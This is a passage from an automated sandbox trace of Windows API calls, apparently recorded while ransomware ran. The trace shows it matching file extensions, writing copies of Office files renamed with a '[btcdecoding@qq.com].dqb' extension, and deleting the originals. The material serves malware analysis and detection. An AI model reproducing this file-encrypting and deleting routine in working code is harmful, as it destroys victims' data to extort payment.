Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.338] lstrlenW (lpString=".zip") returned 4 [0271.338] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0271.339] lstrlenW (lpString=".rar") returned 4 [0271.339] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0271.342] lstrlenW (lpString=".bz2") returned 4 [0271.343] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0271.349] lstrlenW (lpString=".7z") returned 3 [0271.351] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0271.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.353] lstrlenW (lpString=".dbf") returned 4 [0271.354] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0271.354] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.364] lstrlenW (lpString=".1cd") returned 4 [0271.364] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0271.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.369] lstrlenW (lpString=".jpg") returned 4 [0271.369] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0271.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.377] lstrlenW (lpString=".doc") returned 4 [0271.377] lstrcmpiW (lpString1=".doc", lpString2=".INF") returned -1 [0271.377] lstrlenW (lpString=".docx") returned 5 [0271.377] lstrcmpiW (lpString1=".docx", lpString2="R.INF") returned -1 [0271.377] lstrlenW (lpString=".pdf") returned 4 [0271.377] lstrcmpiW (lpString1=".pdf", lpString2=".INF") returned 1 [0271.377] lstrlenW (lpString=".xls") returned 4 [0271.377] lstrcmpiW (lpString1=".xls", lpString2=".INF") returned 1 [0271.377] lstrlenW (lpString=".xlsx") returned 5 [0271.377] lstrcmpiW (lpString1=".xlsx", lpString2="R.INF") returned -1 [0271.377] lstrlenW (lpString=".ppt") returned 4 [0271.377] lstrcmpiW (lpString1=".ppt", lpString2=".INF") returned 1 [0271.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.377] lstrlenW (lpString=".zip") returned 4 [0271.377] lstrcmpiW (lpString1=".zip", lpString2=".INF") returned 1 [0271.377] lstrlenW (lpString=".rar") returned 4 [0271.377] lstrcmpiW (lpString1=".rar", lpString2=".INF") returned 1 [0271.377] lstrlenW (lpString=".bz2") returned 4 [0271.377] lstrcmpiW (lpString1=".bz2", lpString2=".INF") returned -1 [0271.378] lstrlenW (lpString=".7z") returned 3 [0271.378] lstrcmpiW (lpString1=".7z", lpString2="INF") returned -1 [0271.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.378] lstrlenW (lpString=".dbf") returned 4 [0271.378] lstrcmpiW (lpString1=".dbf", lpString2=".INF") returned -1 [0271.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.378] lstrlenW (lpString=".1cd") returned 4 [0271.378] lstrcmpiW (lpString1=".1cd", lpString2=".INF") returned -1 [0271.378] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RICEPAPR\\RICEPAPR.INF") returned 77 [0271.378] lstrlenW (lpString=".jpg") returned 4 [0271.378] lstrcmpiW (lpString1=".jpg", lpString2=".INF") returned 1 [0271.378] Sleep (dwMilliseconds=0x64) [0271.707] Sleep (dwMilliseconds=0x64) [0271.861] Sleep (dwMilliseconds=0x64) [0272.020] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0272.020] lstrlenW (lpString="hmmapi.dll") returned 10 [0272.020] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0272.270] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=52736) returned 1 [0272.270] CloseHandle (hObject=0x324) returned 1 [0272.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll")) returned 0x20 [0272.271] GetFileAttributesW (lpFileName="C:\\Program Files\\Internet Explorer\\hmmapi.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.271] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.271] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.271] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.271] lstrlenW (lpString=".doc") returned 4 [0272.271] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.271] lstrlenW (lpString=".docx") returned 5 [0272.271] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0272.271] lstrlenW (lpString=".pdf") returned 4 [0272.271] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.271] lstrlenW (lpString=".xls") returned 4 [0272.271] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.271] lstrlenW (lpString=".xlsx") returned 5 [0272.271] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0272.271] lstrlenW (lpString=".ppt") returned 4 [0272.271] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.271] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.271] lstrlenW (lpString=".zip") returned 4 [0272.271] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.271] lstrlenW (lpString=".rar") returned 4 [0272.271] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.271] lstrlenW (lpString=".bz2") returned 4 [0272.271] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.271] lstrlenW (lpString=".7z") returned 3 [0272.271] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.271] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.271] lstrlenW (lpString=".dbf") returned 4 [0272.271] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.271] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.271] lstrlenW (lpString=".1cd") returned 4 [0272.271] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.271] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.272] lstrlenW (lpString=".jpg") returned 4 [0272.272] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.272] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.272] lstrlenW (lpString=".doc") returned 4 [0272.272] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString=".docx") returned 5 [0272.272] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0272.272] lstrlenW (lpString=".pdf") returned 4 [0272.272] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString=".xls") returned 4 [0272.272] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString=".xlsx") returned 5 [0272.272] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0272.272] lstrlenW (lpString=".ppt") returned 4 [0272.272] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.272] lstrlenW (lpString=".zip") returned 4 [0272.272] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString=".rar") returned 4 [0272.272] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0272.272] lstrlenW (lpString=".bz2") returned 4 [0272.272] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0272.272] lstrlenW (lpString=".7z") returned 3 [0272.272] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0272.272] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.272] lstrlenW (lpString=".dbf") returned 4 [0272.272] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0272.272] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.272] lstrlenW (lpString=".1cd") returned 4 [0272.272] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0272.273] lstrlenW (lpString="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 45 [0272.273] lstrlenW (lpString=".jpg") returned 4 [0272.273] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0272.273] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0272.273] lstrlenW (lpString="called.exe") returned 10 [0272.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\called.exe" (normalized: "c:\\program files\\microsoft office\\called.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.278] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=75776) returned 1 [0272.278] CloseHandle (hObject=0x328) returned 1 [0272.278] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\called.exe" (normalized: "c:\\program files\\microsoft office\\called.exe")) returned 0x20 [0272.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\called.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\called.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\called.exe" (normalized: "c:\\program files\\microsoft office\\called.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.281] lstrlenW (lpString=".doc") returned 4 [0272.281] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0272.281] lstrlenW (lpString=".docx") returned 5 [0272.281] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0272.281] lstrlenW (lpString=".pdf") returned 4 [0272.281] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0272.281] lstrlenW (lpString=".xls") returned 4 [0272.281] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0272.281] lstrlenW (lpString=".xlsx") returned 5 [0272.281] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0272.281] lstrlenW (lpString=".ppt") returned 4 [0272.281] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0272.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.281] lstrlenW (lpString=".zip") returned 4 [0272.281] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0272.281] lstrlenW (lpString=".rar") returned 4 [0272.281] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0272.281] lstrlenW (lpString=".bz2") returned 4 [0272.281] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0272.281] lstrlenW (lpString=".7z") returned 3 [0272.281] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0272.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.281] lstrlenW (lpString=".dbf") returned 4 [0272.281] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0272.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.281] lstrlenW (lpString=".1cd") returned 4 [0272.282] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0272.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.282] lstrlenW (lpString=".jpg") returned 4 [0272.282] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0272.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.282] lstrlenW (lpString=".doc") returned 4 [0272.282] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0272.282] lstrlenW (lpString=".docx") returned 5 [0272.282] lstrcmpiW (lpString1=".docx", lpString2="d.exe") returned -1 [0272.282] lstrlenW (lpString=".pdf") returned 4 [0272.282] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0272.282] lstrlenW (lpString=".xls") returned 4 [0272.282] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0272.282] lstrlenW (lpString=".xlsx") returned 5 [0272.282] lstrcmpiW (lpString1=".xlsx", lpString2="d.exe") returned -1 [0272.282] lstrlenW (lpString=".ppt") returned 4 [0272.282] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0272.282] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.282] lstrlenW (lpString=".zip") returned 4 [0272.282] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0272.282] lstrlenW (lpString=".rar") returned 4 [0272.282] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0272.282] lstrlenW (lpString=".bz2") returned 4 [0272.282] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0272.282] lstrlenW (lpString=".7z") returned 3 [0272.282] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0272.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.283] lstrlenW (lpString=".dbf") returned 4 [0272.283] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0272.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.283] lstrlenW (lpString=".1cd") returned 4 [0272.283] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0272.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\called.exe") returned 44 [0272.283] lstrlenW (lpString=".jpg") returned 4 [0272.283] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0272.283] Sleep (dwMilliseconds=0x64) [0272.392] Sleep (dwMilliseconds=0x64) [0272.501] Sleep (dwMilliseconds=0x64) [0272.610] Sleep (dwMilliseconds=0x64) [0272.750] Sleep (dwMilliseconds=0x64) [0272.846] Sleep (dwMilliseconds=0x64) [0272.955] Sleep (dwMilliseconds=0x64) [0273.055] Sleep (dwMilliseconds=0x64) [0273.164] Sleep (dwMilliseconds=0x64) [0273.265] Sleep (dwMilliseconds=0x64) [0273.366] Sleep (dwMilliseconds=0x64) [0273.470] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0273.471] lstrlenW (lpString="BABY_01.MID") returned 11 [0273.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.269] GetFileSizeEx (in: hFile=0x1d4, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=7384) returned 1 [0274.270] CloseHandle (hObject=0x1d4) returned 1 [0274.270] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid")) returned 0x20 [0274.339] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.489] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.489] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0274.630] GetLastError () returned 0x0 [0274.630] ReadFile (in: hFile=0x324, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x1cd8, lpOverlapped=0x0) returned 1 [0274.648] WriteFile (in: hFile=0x328, lpBuffer=0x3e30020*, nNumberOfBytesToWrite=0x1ce0, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesWritten=0x338fc9c*=0x1ce0, lpOverlapped=0x0) returned 1 [0274.649] ReadFile (in: hFile=0x324, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.649] WriteFile (in: hFile=0x328, lpBuffer=0x3e30020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesWritten=0x338fc9c*=0xea, lpOverlapped=0x0) returned 1 [0274.649] SetEndOfFile (hFile=0x328) returned 1 [0274.649] CloseHandle (hObject=0x328) returned 1 [0274.649] SetFilePointerEx (in: hFile=0x324, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.649] SetEndOfFile (hFile=0x324) returned 1 [0274.673] CloseHandle (hObject=0x324) returned 1 [0274.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid")) returned 1 [0274.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.692] lstrlenW (lpString=".doc") returned 4 [0274.692] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.693] lstrlenW (lpString=".docx") returned 5 [0274.693] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.693] lstrlenW (lpString=".pdf") returned 4 [0274.693] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.693] lstrlenW (lpString=".xls") returned 4 [0274.693] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.693] lstrlenW (lpString=".xlsx") returned 5 [0274.693] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.693] lstrlenW (lpString=".ppt") returned 4 [0274.693] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.693] lstrlenW (lpString=".zip") returned 4 [0274.693] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.693] lstrlenW (lpString=".rar") returned 4 [0274.693] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.693] lstrlenW (lpString=".bz2") returned 4 [0274.693] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.693] lstrlenW (lpString=".7z") returned 3 [0274.693] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.693] lstrlenW (lpString=".dbf") returned 4 [0274.693] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.693] lstrlenW (lpString=".1cd") returned 4 [0274.693] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.693] lstrlenW (lpString=".jpg") returned 4 [0274.693] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.693] lstrlenW (lpString=".doc") returned 4 [0274.693] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0274.694] lstrlenW (lpString=".docx") returned 5 [0274.694] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0274.694] lstrlenW (lpString=".pdf") returned 4 [0274.694] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0274.694] lstrlenW (lpString=".xls") returned 4 [0274.694] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0274.694] lstrlenW (lpString=".xlsx") returned 5 [0274.694] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0274.694] lstrlenW (lpString=".ppt") returned 4 [0274.694] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0274.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.694] lstrlenW (lpString=".zip") returned 4 [0274.694] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0274.694] lstrlenW (lpString=".rar") returned 4 [0274.694] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0274.694] lstrlenW (lpString=".bz2") returned 4 [0274.694] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0274.694] lstrlenW (lpString=".7z") returned 3 [0274.694] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0274.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.694] lstrlenW (lpString=".dbf") returned 4 [0274.694] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0274.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.694] lstrlenW (lpString=".1cd") returned 4 [0274.694] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0274.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 62 [0274.694] lstrlenW (lpString=".jpg") returned 4 [0274.694] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0274.694] lstrcmpiW (lpString1=".MID", lpString2=".dqb") returned 1 [0274.695] lstrlenW (lpString="FINCL_01.MID") returned 12 [0274.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d4 [0274.732] GetFileSizeEx (in: hFile=0x1d4, lpFileSize=0x338ff1c | out: lpFileSize=0x338ff1c*=12981) returned 1 [0274.732] CloseHandle (hObject=0x1d4) returned 1 [0274.732] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid")) returned 0x20 [0274.781] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.817] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.817] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x338fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_01.MID.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_01.mid.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0274.817] GetLastError () returned 0x0 [0274.817] ReadFile (in: hFile=0x31c, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x32b5, lpOverlapped=0x0) returned 1 [0274.831] WriteFile (in: hFile=0x2d4, lpBuffer=0x3e30020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesWritten=0x338fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0274.832] ReadFile (in: hFile=0x31c, lpBuffer=0x3e30020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x338fed4, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, lpNumberOfBytesRead=0x338fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.832] WriteFile (in: hFile=0x2d4, lpBuffer=0x3e30020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x338fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3e30020*, 